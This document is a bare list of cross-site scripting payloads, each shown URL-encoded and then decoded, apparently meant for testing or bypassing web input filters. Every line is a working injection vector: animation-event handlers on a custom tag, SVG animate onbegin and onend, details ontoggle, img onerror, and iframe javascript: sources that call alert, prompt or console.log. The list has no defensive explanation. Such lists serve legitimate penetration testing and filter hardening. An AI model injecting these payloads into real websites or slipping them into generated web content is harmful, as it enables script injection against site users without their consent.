%3Cstyle%3E%40keyframes%20x%7B%7D%3C%2Fstyle%3E%3Cxss%20style%3D%22animation-name%3Ax%22%20onanimationend%3D%22alert%601%60%22%3E%3C%2Fxss%3E
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert`1`"></xss>
%3Csvg%3E%3Canimate%20onbegin%3Dalert(1)%20attributeName%3Dx%20dur%3D1s%3E
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
%3Csvg%3E%3Canimate%20onend%3Dconsole.log(1)%20attributeName%3Dx%20dur%3D1s%3E
<svg><animate onend=console.log(1) attributeName=x dur=1s>
%3Cdetails%20ontoggle%3Dwindow.alert(1)%20open%3Etest%3C%2Fdetails%3E
<details ontoggle=window.alert(1) open>test</details>
%3Cstyle%3E%40keyframes%20slidein%20%7B%7D%3C%2Fstyle%3E%3Cxss%20style%3D%22animation-duration%3A1s%3Banimation-name%3Aslidein%3Banimation-iteration-count%3A2%22%20onwebkitanimationiteration%3D%22alert(1)%22%3E%3C%2Fxss%3E
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>
%3CIMG%20SRC%3Dx%20onerror%3D%22alert(String.fromCharCode(88%2C83%2C83))%22%3E
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
%3Ciframe%20%20src%3D%22%26Tab%3Bjavascript%3Aprompt(1)%26Tab%3B%22%3E
<iframe  src="&Tab;javascript:prompt(1)&Tab;">
%3Ciframe%20%20src%3D%22javascript%3Aprompt(1)%22%3E
<iframe  src="javascript:prompt(1)">
%3Cimg%20src%3D%60xx%3Axx%60onerror%3Dalert(1)%3E
<img src=`xx:xx`onerror=alert(1)>
